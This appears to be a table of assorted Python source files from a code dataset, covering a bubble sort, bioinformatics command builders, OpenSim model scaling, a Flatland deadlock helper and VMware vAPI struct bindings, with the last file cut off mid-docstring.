text string | size int64 | token_count int64 |
|---|---|---|
# Ternary (conditional) operator demo, e.g.:
#   msg = 'Usuário logado.' if login_user else 'Usuário precisa logar'
# The script below asks for an age in a loop and classifies it; entering an
# age greater than 120 ends the program.
print('Seja bem-vindo ao programa sua idade , agora você vai saber se é adulto ou não \n '
      'Para sair do program escolha uma idade maior que 120\n')

while True:
    idade = input('Qual a sua idade :')
    if not idade.isnumeric():
        # Reject anything that is not a plain non-negative integer.
        print('Você precisa digitar apenas números')
    else:
        idade = int(idade)
        if idade > 120:
            print('Fim do programa')
            break
        # BUG FIX: the original used `if idade < 120` here, so an input of
        # exactly 120 produced no output at all. Any age <= 120 is now
        # classified via the conditional expression being demonstrated.
        usuario = 'Você é maior de idade' if idade >= 18 else 'Usuario menor de idade, vá brincar de durmir '
        print(usuario)
import click
from images_of import command, settings, Reddit
from images_of.bot import Bot
@command
@click.option('--no-post', is_flag=True, help='Do not post to reddit.')
def main(no_post):
    """Reddit Network scraper and x-poster bot.

    Args:
        no_post (bool): When True, run the bot without submitting posts.
    """
    # The user-agent string identifies the bot (network name, version and
    # operator account) to reddit's API.
    r = Reddit('{} v6.0 /u/{}'.format(settings.NETWORK_NAME,
                                      settings.USERNAME))
    r.oauth()  # authenticate before any API calls
    b = Bot(r, should_post=not no_post)
    b.run()


if __name__ == '__main__':
    main()
| 471 | 166 |
from . import verb
import textwrap
from .. import entities
import architext.strings as strings
class EditWorld(verb.Verb):
    """Interactive verb that lets a world creator edit the current world's
    settings: name, public/private visibility, and edit freedom.

    The conversation is a small state machine: every incoming message is
    dispatched to ``self.current_process_function``, which is re-pointed as
    the dialog advances from menu to option-specific handlers.
    """

    command = _('editworld')
    permissions = verb.CREATOR

    def __init__(self, session):
        super().__init__(session)
        # The world being edited is the one containing the user's room.
        self.world = self.session.user.room.world_state.get_world()
        self.option_number = None
        self.current_process_function = self.process_first_message

    def process(self, message):
        """Dispatch *message* to the current dialog step; '/' cancels."""
        if message == '/':
            self.session.send_to_client(strings.cancelled)
            self.finish_interaction()
        else:
            self.current_process_function(message)

    def process_first_message(self, message):
        """Show the edit menu and advance to option selection."""
        title = _('Editing this world: "{world_name}"').format(world_name=self.world.name)
        body = _(
            'Enter the number of the value you want to edit.\n'
            ' 0 - Name\n'
            ' 1 - Make public/private\n'
            ' 2 - Edit freedom'
        )
        out_message = strings.format(title, body, cancel=True)
        self.session.send_to_client(out_message)
        self.current_process_function = self.process_option_number

    def process_option_number(self, message):
        """Validate the chosen menu option and prompt for its new value."""
        try:
            message = int(message)
        except ValueError:
            self.session.send_to_client(strings.not_a_number)
            return
        # Each option bundles the prompt to show with the handler that will
        # process the user's next message.
        options = {
            0: {
                "out_message": _('Enter the new name:'),
                "next_process_function": self.process_new_world_name,
            },
            1: {
                "out_message": _(
                    'This world is {actual_value}.\n'
                    'Do you want to change it to {new_value}? [yes/no]'
                ).format(
                    actual_value=(strings.public if self.world.public else strings.private),
                    new_value=(strings.public if not self.world.public else strings.private)
                ),
                "next_process_function": self.process_public_choice,
            },
            2: {
                "out_message": _(
                    'Who should be able to edit the world?\n'
                    ' 0 - All users.\n'
                    ' 1 - Only you and your designated editors.'
                ),
                "next_process_function": self.process_edit_freedom_option,
            }
        }
        try:
            chosen_option = options[message]
        except KeyError:
            # Number outside the menu range: stay on this step.
            self.session.send_to_client(strings.wrong_value)
            return
        self.session.send_to_client(chosen_option["out_message"])
        self.current_process_function = chosen_option["next_process_function"]

    def process_new_world_name(self, message):
        """Rename the world to *message* (must be non-empty) and finish."""
        if not message:
            self.session.send_to_client(strings.is_empty)
            return
        # NOTE(review): the world is re-fetched here instead of reusing
        # self.world — presumably to avoid saving a stale copy; confirm.
        world = self.session.user.room.world_state.get_world()
        world.name = message
        world.save()
        self.finish_interaction()
        self.session.send_to_client(_("The name has been successfully changed."))
        return

    def process_public_choice(self, message):
        """Toggle world visibility on 'yes'; keep it unchanged on 'no'."""
        if message.lower() in strings.yes_input_options:
            try:
                self.world.toggle_public()
            except entities.PublicWorldLimitReached:
                self.session.send_to_client(_('You have reached the limit of public worlds in this server. Try to make another world private or ask the admin to increase your limit.'))
                self.finish_interaction()
                return
            self.session.send_to_client(_('This world is now {public_or_private}.').format(public_or_private=(strings.public if self.world.public else strings.private)))
            self.finish_interaction()
        elif message.lower() in strings.no_input_options:
            self.session.send_to_client(_('OK. The world remains {public_or_private}').format(public_or_private=(strings.public if self.world.public else strings.private)))
            self.finish_interaction()
        else:
            # Unrecognised answer: ask again without ending the dialog.
            self.session.send_to_client(_('Please enter "yes" or "no".'))

    def process_edit_freedom_option(self, message):
        """Set whether everyone ('0') or only designated editors ('1') may edit."""
        if message == '0':
            self.session.user.room.world_state.get_world().set_to_free_edition()
            self.session.send_to_client(_("Everybody can edit this world now."))
            self.finish_interaction()
        elif message == '1':
            self.session.user.room.world_state.get_world().set_to_privileged_edition()
            self.session.send_to_client(_("Only your designated editors and you can edit this world now."))
            self.finish_interaction()
        else:
            self.session.send_to_client(strings.wrong_value)
class Solution:
    """LeetCode 38: generate terms of the count-and-say sequence."""

    # @return a string
    def countAndSay(self, n):
        """Return the n-th term (1-based) of the count-and-say sequence.

        Term 1 is '1'; each subsequent term run-length-describes the
        previous one (e.g. '1211' -> one 1, one 2, two 1s -> '111221').
        """
        say = '1'
        for _ in range(n - 1):
            say = self._count_say(say)
        return say

    def _count_say(self, s):
        """Run-length encode *s*: each maximal run becomes <count><char>."""
        curr = None
        count = 0
        say = ""
        for c in s:
            if c == curr:
                count += 1
            else:
                if curr is not None:
                    say += str(count) + curr
                curr = c
                count = 1
        # BUG FIX: the original appended str(count) + str(curr)
        # unconditionally, so an empty input produced '0None'. Guard the
        # final flush so _count_say('') returns ''.
        if curr is not None:
            say += str(count) + curr
        return say
# Quick manual check: the 4th count-and-say term is '1211'.
solver = Solution()
print(solver.countAndSay(4))
| 569 | 174 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import os
from os.path import join, dirname, realpath, basename
import rasterio
import click
import glob
import subprocess
import xarray as xr
import pandas as pd
from datetime import timedelta
from rasterio.transform import from_origin
@click.command()
@click.argument('ddir')
@click.argument('area')
@click.argument('time')
@click.option('-p', '--postfix', default='')
def downscale(ddir, area, time, postfix='', dt=-1):
    """Downscale the flood-depth field ('flddph') for one date and write it
    as a high-resolution GeoTIFF for the given region.

    Args:
        ddir: directory containing the flddph*.nc input files.
        area: region name; must match an entry in map/hires/location.txt.
        time: date to extract (any pandas-parsable string).
        postfix: optional suffix appended to the output .tif name.
        dt: day shift applied to the netCDF time axis (default -1).
    """
    # parse time
    t = pd.to_datetime(time)
    # read regions info: per-area grid definition (west, north, csize, nx, ny)
    sdir = dirname(realpath(__file__))
    fn_regions = join(sdir, 'map', 'hires', 'location.txt')
    click.echo(fn_regions)
    regions = pd.read_csv(fn_regions, delim_whitespace=True, index_col=0).T \
        .set_index('area').astype(float).to_dict(orient='index')
    # read nc
    fn_nc = join(ddir, 'flddph*.nc')
    ds = xr.open_mfdataset(fn_nc, chunks={'time': 10})
    if dt != 0:
        # Shift the time axis by dt days.
        # NOTE(review): dt is not exposed as a CLI option, so the default
        # -1 day shift is always applied — confirm this is intended.
        ds['time'] = ds.time.to_index() + timedelta(days=dt)
    data = ds.flddph.sel(time=time).data
    data = np.where(np.isnan(data), 1e+20, data)  # mv = 1e20
    # write to bin
    datestr = '{:04d}{:02d}{:02d}'.format(t.year, t.month, t.day)
    fn_out_bin = join(sdir, basename(fn_nc).replace('*.nc', datestr))
    click.echo(fn_out_bin)
    # BUG FIX: raw float bytes must be written in binary mode ('wb');
    # text mode 'w' raises TypeError on bytes under Python 3.
    with open(fn_out_bin, 'wb') as fid:
        fid.write(data.astype('f4').tobytes())
    # downscale via the external fortran/C tool
    click.echo('downscaling...')
    msg = ['./downscale_flddph', str(area), basename(fn_out_bin), '1']
    click.echo(' '.join(msg))
    subprocess.call(msg, cwd=sdir, stderr=subprocess.STDOUT)
    # open binary output
    fn_fld = join(sdir, '{:s}.flood'.format(area))
    ny, nx = int(regions[area]['ny']), int(regions[area]['nx'])
    # BUG FIX: read the binary result in 'rb' mode for np.fromfile; text
    # mode can mis-decode or corrupt the stream under Python 3.
    with open(fn_fld, 'rb') as fid:
        data = np.fromfile(fid, 'f4').reshape(ny, nx)
    # write to geotiff
    fn_out_tif = join(ddir, basename(fn_out_bin) + postfix + '.tif')
    click.echo('writing to ' + fn_out_tif)
    west, north, csize = regions[area]['west'], regions[area]['north'], regions[area]['csize']
    transform = from_origin(west, north, csize, csize)
    with rasterio.open(fn_out_tif, 'w', driver='GTiff', height=data.shape[0],
                       compress='lzw', width=data.shape[1], count=1, dtype=str(data.dtype),
                       crs='+proj=latlong', transform=transform, nodata=-9999) as dst:
        dst.write(data, 1)
    # remove intermediate binary files
    os.unlink(fn_out_bin)
    os.unlink(fn_fld)


if __name__ == "__main__":
    downscale()
| 2,510 | 970 |
# June 7 2018
# Author: Samuel Salemi
# University of Guelph Masters Graduate
# This script determines scaling factors and places them on model Gait2354
def scale():
    """Scale the generic Gait2354 model to the subject and save the result.

    Pipeline: load the generic locked-joint model, attach the study marker
    set, then run OpenSim's ScaleTool in two phases — ModelScaler (scale
    segments from the static marker trial) and MarkerPlacer (move model
    markers to match the static pose). Outputs land in <subResultsDir>/scale.
    """
    import os
    import opensim as osim
    import shutil
    import directories

    # Global Directories
    # NOTE(review): directories.main(directories) passes the module itself
    # as the argument — preserved as-is; confirm the intended API.
    allDir = list(directories.main(directories))
    parentDir = allDir[0]
    paramsDir = allDir[1]
    genericDir = allDir[2]
    subID = allDir[4]
    subResultsDir = allDir[5]

    # Get generic Model
    genericModel = "gait2354_LockedJoints.osim"
    genericModelFile = genericDir + "/" + genericModel
    if not os.path.exists(subResultsDir):
        os.mkdir(subResultsDir)

    # generic input XML files
    scaleSetupFull = paramsDir + "/setupScale.xml"
    markerSetFull = paramsDir + "/markerSet.xml"

    # Make scale directory if non-existent (recreated fresh on every run)
    scaleResultsDir = subResultsDir + "/scale"
    if os.path.exists(scaleResultsDir):
        shutil.rmtree(scaleResultsDir, ignore_errors=True)
    if not os.path.exists(scaleResultsDir):
        os.mkdir(scaleResultsDir)

    # Output XML Files
    outputScaleFile = subID + "_scaleFactors.xml"
    adjustedMarkerSet = subID + "_movedMarkers.xml"

    # Output Model Files
    outputModelFile = subID + ".osim"

    # Input Data Files
    dataFiles = parentDir + "/data/osDemo"
    staticMarkerFile = "subject01_static.trc"
    staticMarkerFull = dataFiles + "/" + staticMarkerFile
    shutil.copy(staticMarkerFull, scaleResultsDir + "/" + staticMarkerFile)

    # Output Data Files
    staticCoordinates = subID + "_staticCoordinates.mot"

    # Subject Measurements
    subjectMass = 72.60000000

    # Load Model
    aModel = osim.Model(genericModelFile)
    aModel.setName(subID)

    # Initialize System
    aModel.initSystem()
    aState = aModel.initSystem()

    # Add Marker Set
    newMarkers = osim.MarkerSet(markerSetFull)
    aModel.replaceMarkerSet(aState, newMarkers)

    # Re-initialize State (needed after changing the marker set)
    aState = aModel.initSystem()

    # Get Time Array for .trc file
    markerData = osim.MarkerData(staticMarkerFull)
    # Get Initial and Final Time
    initial_time = markerData.getStartFrameTime()
    final_time = markerData.getLastFrameTime()
    # Create an array double and apply the time range
    TimeArray = osim.ArrayDouble()
    TimeArray.set(0, initial_time)
    TimeArray.set(1, final_time)

    # Scale Tool
    scaleTool = osim.ScaleTool(scaleSetupFull)
    scaleTool.setSubjectMass(subjectMass)

    # GenericModelMaker-
    # Tell scale tool to use the loaded model
    scaleTool.getGenericModelMaker().setModelFileName(
        genericDir + "/" + genericModel)
    # Set the Marker Set file (in case a marker set isn't attached to the model)
    scaleTool.getGenericModelMaker().setMarkerSetFileName(markerSetFull)

    # ModelScaler-
    # Whether or not to use the model scaler during scale
    scaleTool.getModelScaler().setApply(1)
    # Set the marker file (.trc) to be used for scaling
    scaleTool.getModelScaler().setMarkerFileName("/" + staticMarkerFile)
    # set a time range
    scaleTool.getModelScaler().setTimeRange(TimeArray)
    # Indicating whether or not to preserve relative mass between segments
    scaleTool.getModelScaler().setPreserveMassDist(1)
    # Name of OpenSim model file (.osim) to write when done scaling.
    scaleTool.getModelScaler().setOutputModelFileName("")
    # Filename to write scale factors that were applied to the unscaled model (optional)
    scaleTool.getModelScaler().setOutputScaleFileName(outputScaleFile)
    # Run model scaler Tool
    scaleTool.getModelScaler().processModel(
        aState, aModel, scaleResultsDir, subjectMass)

    # re-initialize after scaling
    aState = aModel.initSystem()

    # Marker Placer
    # Whether or not to use the marker placer during scale
    scaleTool.getMarkerPlacer().setApply(1)
    # Set the marker placer time range
    scaleTool.getMarkerPlacer().setTimeRange(TimeArray)
    # Set the marker file (.trc) to be used for scaling
    scaleTool.getMarkerPlacer().setStaticPoseFileName("/" + staticMarkerFile)
    # Return name to a variable for future use in functions
    # NOTE(review): setOutputModelFileName is a setter and presumably
    # returns None, so scaledAdjustedModel is unlikely to hold the name —
    # confirm before relying on this variable.
    scaledAdjustedModel = scaleTool.getMarkerPlacer(
    ).setOutputModelFileName("/" + outputModelFile)
    # Set the output motion filename
    scaleTool.getMarkerPlacer().setOutputMotionFileName("/" + staticCoordinates)
    # Set the output xml of the marker adjustments
    scaleTool.getMarkerPlacer().setOutputMarkerFileName("/" + adjustedMarkerSet)
    # Maximum amount of movement allowed in marker data when averaging
    scaleTool.getMarkerPlacer().setMaxMarkerMovement(-1)
    # Run Marker Placer
    scaleTool.getMarkerPlacer().processModel(aState, aModel, scaleResultsDir)

    # Save the fully-populated scale setup for reproducibility
    scaleTool.printToXML(scaleResultsDir + "/" + subID + "_setupScale.xml")

    # Clear Terminal
    os.system('cls' if os.name == 'nt' else 'clear')
    shutil.copy(scaleResultsDir + "/" + outputModelFile, subResultsDir)
    return ()
| 5,083 | 1,579 |
# Exercise #2: Sorting lists.
# Suggested technologies: Python or Javascript (pick one), Git
# Write a program that, given an unordered list of numbers, returns a list
# with all of its values sorted from smallest to largest. The built-in
# "sort" (or other existing sorting helpers) must not be used.
# ordenar([5,2,4,1]) = [1,2,4,5]
import random

print("Lista Desordenada")
# Demo input: the numbers 0..9 in random order.
unordered = list(range(10))
random.shuffle(unordered)
print(unordered)
def ordenar(lista):
    """Sort *lista* in place (ascending) with bubble sort and return it.

    After each pass the largest remaining element has bubbled to the end,
    so the unsorted boundary shrinks by one; a pass with no swaps means
    the list is already sorted and we can stop early.
    """
    limite = len(lista) - 1
    while limite > 0:
        hubo_cambio = False
        for pos in range(limite):
            if lista[pos] > lista[pos + 1]:
                # Swap adjacent out-of-order neighbours.
                lista[pos], lista[pos + 1] = lista[pos + 1], lista[pos]
                hubo_cambio = True
        if not hubo_cambio:
            break
        limite -= 1
    return lista
# Sort the demo list and show the result.
listaOrdenada = ordenar(unordered)
print("Lista Ordenada ")
print(listaOrdenada)
| 1,159 | 447 |
import os
from shlex import quote
def _bowtie2build_cmd(bt2Path="bowtie2-build",IdxPath="db/GenIdx",genome=None):
'''Construct the bowtie2-build command'''
# Base command
cmd = ' '.join(['mkdir db &&',quote(bt2Path),quote(os.path.abspath(genome)),IdxPath])
return cmd
def _bowtie2_cmd(bt2Path="bowtie2",tirFasta=None,IdxPath="db/GenIdx",cores=None):
'''Construct commands for bowtie2 mapping.'''
# bowtie2 -x genidx -f -a --very-sensitive-local -U TIR.fa --al alignments.bam
# Base command
cmd = ' '.join([quote(bt2Path),'-f -a --very-sensitive-local -x',IdxPath,'-U',quote(os.path.abspath(tirFasta)),'> alignments.sam'])
# Optional set cores
if cores:
cmd += ' --threads ' + str(cores)
return cmd
def _bam2bed_cmd(samPath="samtools",bedPath="bedtools",tempDir=None):
''' Filtering mapped reads with bedtools and samtools.
# Fwd hits
samtools view -b -F 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"+"}' > mapped.bed
# Rev hits
samtools view -b -f 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"-"}' >> mapped.bed
'''
# Base command
mappedPath = os.path.join(tempDir,'bowtie2mappedTIR.bed')
cmds = list()
# All reads not on rev strand or unmapped
cmds.append(' '.join([quote(samPath),"view -b -F 0x10,0x4 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"+\"}' >",quote(mappedPath)]))
# Only reads on reverse strand
cmds.append(' '.join([quote(samPath),"view -b -f 0x10 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"-\"}' >>",quote(mappedPath)]))
return cmds,mappedPath
| 1,666 | 689 |
from envs.flatland.observations.segment_graph import Graph
def get_coords(direction):
    """Return the (row, col) grid offset for a direction code 0-3.

    Unknown codes yield None, matching the original fall-through behavior.
    """
    # NOTE(review): 0 -> up, 1 -> right, 2 -> down, 3 -> left in grid
    # coordinates — presumably flatland's direction encoding; confirm.
    offsets = {
        0: (-1, 0),
        1: (0, 1),
        2: (1, 0),
        3: (0, -1),
    }
    return offsets.get(direction)
def stop_deadlock_when_unavoidable(timestamp_segment_dict, to_reset, handle, direction, action, action_mask, old_pos):
    """Keep agent *handle* from entering an already-claimed track segment.

    Computes the cell the agent would move into, finds which outgoing
    segment (from the agent's current graph node) contains that cell, and
    either claims that segment for this agent or — if it is already
    claimed — replaces the chosen action with another allowed one.

    Returns the (possibly updated) occupancy dict, the list of segments to
    release later, and the (possibly replaced) action.
    """
    # print(obs[agent_id][8])
    dx, dy = get_new_pos_dx_dy(direction, action)
    new_pos = (old_pos[0] + dx, old_pos[1] + dy)
    # print(handle, direction, old_pos, new_pos)
    # Candidate segments: every edge leaving the agent's current node.
    fr, to = Graph.agents[handle].CurrentNode, Graph.agents[handle].NextNodes
    segments = []
    for node in to:
        segments.append(Graph.graph_global[fr][node]['segment'])
    # Locate the segment that contains the would-be next cell.
    # NOTE(review): the break only exits the inner loop, so a later segment
    # that also contains new_pos would overwrite curr_segment — confirm
    # segments cannot overlap.
    curr_segment = None
    for segment in segments:
        for x, y, _ in segment:
            if new_pos == (x, y):
                curr_segment = segment
                break
    if curr_segment is None:
        # The move does not enter any known segment: nothing to do.
        return timestamp_segment_dict, to_reset, action
    # Key the occupancy dict by the segment's set of cells (order/direction
    # agnostic, hashable).
    curr_segment = frozenset((x, y) for x, y, _ in curr_segment)
    if curr_segment not in timestamp_segment_dict or not timestamp_segment_dict[curr_segment]:
        # Segment is free: claim it and remember to release it later.
        timestamp_segment_dict[curr_segment] = True
        # print(f"occupied by {handle} segment: {curr_segment}")
        to_reset.append(curr_segment)
    else:
        # Segment already occupied: choose a different allowed action.
        # print(f"old action was {action}")
        action = pick_new_action(action, action_mask)
        # print(f"new action is {action}")
    return timestamp_segment_dict, to_reset, action
def reset_timestamp_dict(timestamp_segment_dict, to_reset):
    """Mark each segment listed in *to_reset* as unoccupied; return the dict."""
    # Bulk-update instead of assigning one key at a time.
    timestamp_segment_dict.update((segment, False) for segment in to_reset)
    return timestamp_segment_dict
def pick_new_action(old_action, action_mask):
    """Pick the first still-allowed action other than *old_action*.

    Mutates *action_mask* in place: disables the old action's slot and
    slot 3 (action 4). Actions are 1-based indices into the mask. If no
    alternative remains, the original action is returned unchanged.
    """
    action_mask[old_action - 1] = 0
    action_mask[3] = 0
    # Return the first remaining allowed action, if any.
    for idx, allowed in enumerate(action_mask):
        if allowed == 1:
            return idx + 1
    return old_action
def get_new_pos_dx_dy(direc, action):
    """Return the (row, col) displacement for taking *action* while
    heading *direc*; None for any combination not listed below.

    NOTE(review): actions 1/2/3 rotate the heading left/keep it/rotate it
    right relative to *direc* — inferred from the offset pattern; confirm
    against the flatland action encoding.
    """
    moves = {
        (0, 1): (0, -1), (0, 2): (-1, 0), (0, 3): (0, 1),
        (1, 1): (-1, 0), (1, 2): (0, 1), (1, 3): (1, 0),
        (2, 1): (0, 1), (2, 2): (1, 0), (2, 3): (0, -1),
        (3, 1): (1, 0), (3, 2): (0, -1), (3, 3): (-1, 0),
    }
    return moves.get((direc, action))
| 2,716 | 901 |
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
class Event:
    """Plain data holder for a single service event record."""

    def __init__(self, message=None, event_date=None, version_label=None,
                 app_name=None, environment_name=None, severity=None,
                 platform=None):
        """Store every field as a same-named attribute (all default None)."""
        fields = (
            ('message', message),
            ('event_date', event_date),
            ('version_label', version_label),
            ('app_name', app_name),
            ('environment_name', environment_name),
            ('severity', severity),
            ('platform', platform),
        )
        for name, value in fields:
            setattr(self, name, value)
| 997 | 293 |
"""
Bindings data classes
"""
__author__ = 'VMware, Inc.'
__copyright__ = 'Copyright 2015-2016 VMware, Inc. All rights reserved. -- VMware Confidential' # pylint: disable=line-too-long
import decimal
import json
import six
import sys
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.serializers import cleanjson
from vmware.vapi.data.value import StructValue
from vmware.vapi.lib.converter import Converter
# TODO: Split this into static and dynamic structures.
class VapiStruct(object):
    """
    Representation of IDL Structure in python language bindings
    """
    # Class-level validators applied to StructValues of this type.
    _validator_list = []
    # Dict of canonical to pep names for fields whose canonical name does not
    # match the pep name
    _canonical_to_pep_names = {}

    def __init__(self, struct_value=None, rest_converter_mode=None):
        """
        Initialize VapiStruct

        :type mappings: :class:`dict` or :class:`None`
        :param mappings: A mapping for all field names whose canonical name does
            not match PEP8 standard name
        :type rest_converter_mode: :class:`str` or :class:`None`
        :param rest_converter_mode: Converter mode to be used to be
            compatible for Vapi Rest. If None or unknown string value,
            then the default Json Rpc converter is used
        :type struct_value: :class:`vmware.vapi.data.value.StructValue`
        :param struct_value: StructValue to be used for VapiStruct
            or :class:`None`
        """
        # fields will either be in native form or in unknown
        # fields
        self._extra_fields = None
        if (struct_value is not None and
                not isinstance(struct_value, StructValue)):
            raise TypeError(
                'struct_value must be of type '
                + '\'vmware.vapi.data.value.StructValue\' or None')
        self._struct_value = struct_value
        self._rest_converter_mode = rest_converter_mode

    def get_field(self, attr):
        """
        Returns the struct field value

        :type attr: :class:`str`
        :param attr: Canonical field name
        :rtype: :class:`object`
        :return: Field value
        """
        # Translate canonical -> PEP name when a mapping exists.
        if (self._canonical_to_pep_names and
                attr in self._canonical_to_pep_names):
            return getattr(self, self._canonical_to_pep_names[attr])
        else:
            return getattr(self, attr)

    @classmethod
    def validate_struct_value(cls, struct_value):
        """
        Validate if the given struct value satisfies all
        the constraints of this VapiStruct.

        :type struct_value: :class:`vmware.vapi.data.value.StructValue`
        :param struct_value: StructValue to be validated
        :raise :class:`vmware.vapi.exception.CoreException` if a constraint is
            not satisfied
        """
        if cls._validator_list:
            for validator in cls._validator_list:
                msg_list = validator.validate(struct_value, None)
                raise_core_exception(msg_list)

    def validate_constraints(self):
        """
        Validate if the current VapiStruct instance satisfies all the
        constraints of this VapiStruct type.

        :raise :class:`vmware.vapi.exception.CoreException` if a constraint is
            not satisfied
        """
        struct_value = self.get_struct_value()
        self.validate_struct_value(struct_value)

    @classmethod
    def get_binding_type(cls):
        """
        Returns the corresponding BindingType for the VapiStruct class

        :rtype: :class:`vmware.vapi.bindings.type.BindingType`
        :return: BindingType for this VapiStruct, or None if not yet set
        """
        return getattr(cls, '_binding_type', None)

    @classmethod
    def _set_binding_type(cls, binding_type):
        """
        Set the underlying BindingType for this VapiStruct.

        :type binding_type: :class:`vmware.vapi.bindings.type.BindingType`
        :param binding_type: BindingType for this VapiStruct
        """
        cls._binding_type = binding_type

    def get_struct_value(self):
        """
        Returns the corresponding StructValue for the VapiStruct class

        :rtype: :class:`vmware.vapi.data.value.StructValue`
        :return: StructValue for this VapiStruct
        """
        # For dynamic structures
        if self._struct_value:
            return self._struct_value
        else:
            # For static structures import TypeConverter here since
            # otherwise it causes circular imports
            from vmware.vapi.bindings.converter import TypeConverter
            struct_value = TypeConverter.convert_to_vapi(
                py_val=self, binding_type=self._binding_type)
            return struct_value

    def _get_extra_fields(self):
        """
        Get the fields that are not part of the static definition for this
        VapiStruct. This is an internal method and should only be used by vAPI
        runtime.

        :rtype :class:`dict` of :class:`str` and
            :class:`vmware.vapi.data.value.DataValue`
        :return Fields not part of the static definition for this VapiStruct
        """
        return self._extra_fields or {}

    def _set_extra_fields(self, extra_fields=None):
        """
        Set the fields that are not part of the static definition for this
        VapiStruct. This is an internal method and should only be used by vAPI
        runtime.

        :type extra_fields: :class:`dict` of :class:`str` and
            :class:`vmware.vapi.data.value.DataValue` or :class:`None`
        :param extra_fields: Fields not part of the static definition for
            this VapiStruct
        """
        self._extra_fields = extra_fields

    @classmethod
    def _get_pep_name(cls, canonical_name):
        """
        Return the pep name for the provided canonical name

        :rtype: :class:`str`
        :return: Pep name used in the binding
        """
        if (cls._canonical_to_pep_names
                and canonical_name in cls._canonical_to_pep_names):
            return cls._canonical_to_pep_names[canonical_name]
        else:
            # No explicit mapping: derive the name mechanically.
            return Converter.canonical_to_pep(canonical_name)

    def convert_to(self, cls):
        """
        Convert the underlying StructValue to an instance of the provided class
        if possible. Conversion will be possible if the StructValue contains
        all the fields expected by the provided class and the type of the value
        in each fields matches the type of the field expected by the provided
        class.

        :type cls: :class:`vmware.vapi.data.value.StructValue`
        :param cls: The type to convert to
        :rtype: :class:'vmware.vapi.bindings.struct.VapiStruct'
        :return: The converted value
        """
        # Import TypeConverter here since otherwise it causes circular imports
        from vmware.vapi.bindings.converter import TypeConverter
        return TypeConverter.convert_to_python(
            vapi_val=self.get_struct_value(),
            binding_type=cls.get_binding_type(),
            rest_converter_mode=self._rest_converter_mode)

    def to_json(self):
        """
        Convert the object into a json string.

        :rtype: :class:`str`
        :return: JSON string representation of this object
        """
        struct_value = self.get_struct_value()
        return cleanjson.DataValueConverter.convert_to_json(struct_value)

    def to_dict(self):
        """
        Convert the object into a python dictionary. Even the nested types
        are converted to dictionaries.

        :rtype: :class:`dict`
        :return: Dictionary representation of this object
        """
        # TODO: Implement native converter from DataValue -> Dictionary
        # to improve performance if it is used heavily
        return json.loads(self.to_json(), parse_float=decimal.Decimal)

    def _get_attrs(self):
        """
        Returns the attributes of the vAPI structure object

        :rtype: :class:`list` of :class:`str`
        :return: List of attributes of this object
        """
        # Using getmembers in inspect to return all the attributes
        # of this object. And later filter those to get only the
        # public data attributes
        return [k for k in six.iterkeys(vars(self))
                if not k.startswith('_')]

    def __eq__(self, other):
        # NOTE(review): no isinstance check — equality compares only the
        # attributes present on *self*; getattr on *other* raises
        # AttributeError if an attribute is missing. Confirm callers only
        # compare like-typed structs.
        if other is None:
            return False
        for attr in self._get_attrs():
            if getattr(self, attr) != getattr(other, attr):
                return False
        return True

    def __ne__(self, other):
        return not (self == other)

    def __repr__(self):
        class_name = self.__class__.__name__
        attrs = self._get_attrs()
        result = ', '.join(
            ['%s=%s' % (attr, repr(getattr(self, attr)))
             for attr in attrs])
        return '%s(%s)' % (class_name, result)

    def __str__(self):
        attrs = self._get_attrs()
        result = ', '.join(
            ['%s : %s' % (attr, str(getattr(self, attr)))
             for attr in attrs])
        return '{%s}' % result

    def __hash__(self):
        # Hash is derived from the string form, keeping it consistent with
        # the attribute-based __eq__ above.
        return str(self).__hash__()
class PrettyPrinter(object):
    """
    Helper class to pretty print Python native values (with special support
    for VapiStruct objects).
    """
    def __init__(self, stream=sys.stdout, indent=2):
        """
        Initialize PrettyPrinter

        :type stream: :class:`object`
        :param stream: A stream object that implements File protocol's
            write operation
        :type indent: :class:`int`
        :param indent: Indentation to be used for new lines
        """
        self._stream = stream
        self._indent = indent

    def pprint(self, value, level=0):
        """
        Print a Python native value

        :type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
        :param value: VapiStruct to be pretty printed
        :type level: :class:`int`
        :param level: Indentation level
        """
        self._process_value(value, level)

    def _print_level(self, value, level, newline=True):
        """
        Print data at a given indentation level

        :type value: :class:`str`
        :param value: String to be printed
        :type level: :class:`int`
        :param level: Indentation level
        :type newline: :class:`bool`
        :param newline: If true, prints a new line after the data. If false,
            only prints the data
        """
        if level:
            self._stream.write(' ' * level + value)
        else:
            self._stream.write(value)
        if newline:
            self._stream.write('\n')

    def _process_value(self, value, level=0):
        """
        Process a value: dispatch to the container-specific printer or emit
        a scalar directly.

        :type value: :class:`object`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        if isinstance(value, VapiStruct):
            self._pprint_struct(value, level + self._indent)
        elif isinstance(value, dict):
            self._pprint_dict(value, level + self._indent)
        elif isinstance(value, list):
            self._pprint_list(value, level + self._indent)
        elif isinstance(value, six.string_types):
            self._print_level("'%s'," % value, 0)
        elif isinstance(value, six.integer_types):
            self._print_level('%s,' % value, 0)
        elif value is None:
            self._print_level('None,', 0)
        else:
            self._print_level('%s,' % value, level)

    def _pprint_struct(self, value, level=0):
        """
        Pretty print a struct as ClassName(attr=value, ...), one attribute
        per line, attributes sorted by name.

        :type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        class_name = value.__class__.__name__
        self._print_level(class_name + '(', 0)
        for k in sorted(value._get_attrs()):  # pylint: disable=W0212
            v = getattr(value, k)
            self._print_level('%s=' % k, level, False)
            self._process_value(v, level)
        self._print_level('),', level - self._indent)

    def _pprint_dict(self, value, level=0):
        """
        Pretty print a dictionary with sorted keys.

        :type value: :class:`dict`
